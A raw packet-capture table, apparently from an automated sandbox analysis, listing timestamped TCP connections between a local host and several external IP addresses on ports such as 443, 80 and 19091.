                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170886040 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170898914 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170926094 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.176409960 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.176426888 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.176485062 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.176493883 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.176645041 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.181966066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.181988001 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.182028055 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.182035923 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.182051897 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.182071924 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.186958075 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.186974049 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.187026024 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.187033892 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.187082052 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.192657948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.192676067 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.192729950 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.192738056 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.192780018 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.197937965 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.197957993 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.197999001 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.198005915 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.198029995 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.198045015 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.286751032 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.286772013 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.286837101 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.286875010 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.287487984 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.327472925 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.327490091 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.454216957 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.454304934 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.456478119 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.575954914 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.784204006 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.903937101 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.904696941 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.904696941 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.024324894 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.969127893 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.971771955 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.091629982 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.091650963 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.091665030 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.503943920 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.503987074 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504021883 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504041910 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504079103 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504113913 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504122019 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504148960 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504184961 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504185915 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504262924 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504297972 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504307032 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504333019 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.504373074 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.512288094 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.515594959 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.515650988 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.559854031 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.623723030 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.637595892 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.669229031 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.720802069 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.720860958 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.720901966 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.723159075 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.723242044 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.723283052 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.731564999 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.731678009 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.731726885 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.739988089 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.740065098 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.740107059 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.748502016 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.748547077 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.748584986 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.756808996 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.756882906 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.756922960 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.757093906 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.765172958 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.765290022 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.765333891 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.773633003 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.773689985 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.773741961 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.781930923 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.782079935 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.782146931 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.790504932 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.790577888 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.790617943 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.798698902 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.798816919 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.798870087 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.807116985 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.840361118 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.840599060 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.938132048 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.938153028 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.938214064 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.940589905 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.940665007 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.940699100 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.946165085 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.946289062 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.946566105 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.951756001 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.951859951 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.951910019 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.957302094 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.957437038 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.957628965 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.962873936 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.962899923 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.963067055 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.968450069 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.968569994 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.968611956 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.974009991 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.974128962 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.974323988 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.977802038 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.977924109 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.978391886 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.981693029 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.388659000 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.391201973 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.391326904 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.391371012 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.393954039 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.394061089 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.394103050 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.396697044 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.396800041 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.396838903 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399485111 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399502039 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399538994 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402213097 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402292013 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402335882 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.404944897 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.405102015 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.405138016 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407705069 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407798052 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407845974 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410444021 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410531044 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410618067 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413218975 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413285971 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413429022 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.415925026 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.416083097 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.416126966 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418644905 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418765068 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418801069 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421418905 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421600103 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421669006 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424227953 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424319983 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424361944 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.426883936 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.426992893 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.427028894 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429603100 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429728985 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429797888 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432387114 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432431936 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432481050 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739072084 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739135981 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.744915962 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864434004 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293493032 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293662071 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.296830893 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.416635036 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.467242002 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.586750984 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.586935043 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.697072983 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.697175980 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846714020 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846872091 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.848267078 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.967760086 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.007144928 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.126955986 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.397253036 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.397352934 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.536041021 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.536104918 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284045935 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284368038 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284661055 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403749943 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403856039 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403918028 CET804974839.156.85.200192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404105902 CET804974939.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404184103 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404266119 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.406244993 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.455367088 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.525744915 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.113683939 CET4975180192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.118736029 CET4975280192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.233356953 CET804975139.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.233422995 CET4975180192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.238246918 CET804975239.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.238308907 CET4975280192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001564026 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001821995 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002003908 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002021074 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002183914 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002258062 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002707005 CET4975580192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.122227907 CET804975539.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.122400999 CET4975580192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232032061 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232230902 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:05:44.667208910 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:44.667743921 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.619580030 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739486933 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739501953 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739509106 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739512920 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.385091066 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.387902021 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.507512093 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.044307947 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.044397116 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.163994074 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.164851904 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.732121944 CET5002819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.851650000 CET1909150028118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.851876020 CET5002819091192.168.2.4118.107.44.219
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.903850079 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.911745071 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.028691053 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.122781038 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.341618061 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.341686964 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.450596094 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.450696945 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.560055017 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.560240984 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.669410944 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.669459105 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.778726101 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.888161898 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.997531891 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.106844902 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.216236115 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.325675964 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.435165882 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.544915915 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.653949022 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.763221025 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816519022 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816556931 CET80100041.192.136.134192.168.2.4
